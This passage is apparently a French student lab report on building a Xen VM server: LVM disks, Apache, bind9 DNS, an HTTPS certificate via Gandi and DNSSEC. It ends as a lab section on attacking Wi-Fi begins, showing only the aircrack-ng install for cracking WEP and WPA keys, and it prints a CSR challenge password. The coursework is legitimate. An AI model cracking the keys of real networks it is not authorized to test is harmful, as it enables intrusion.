      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
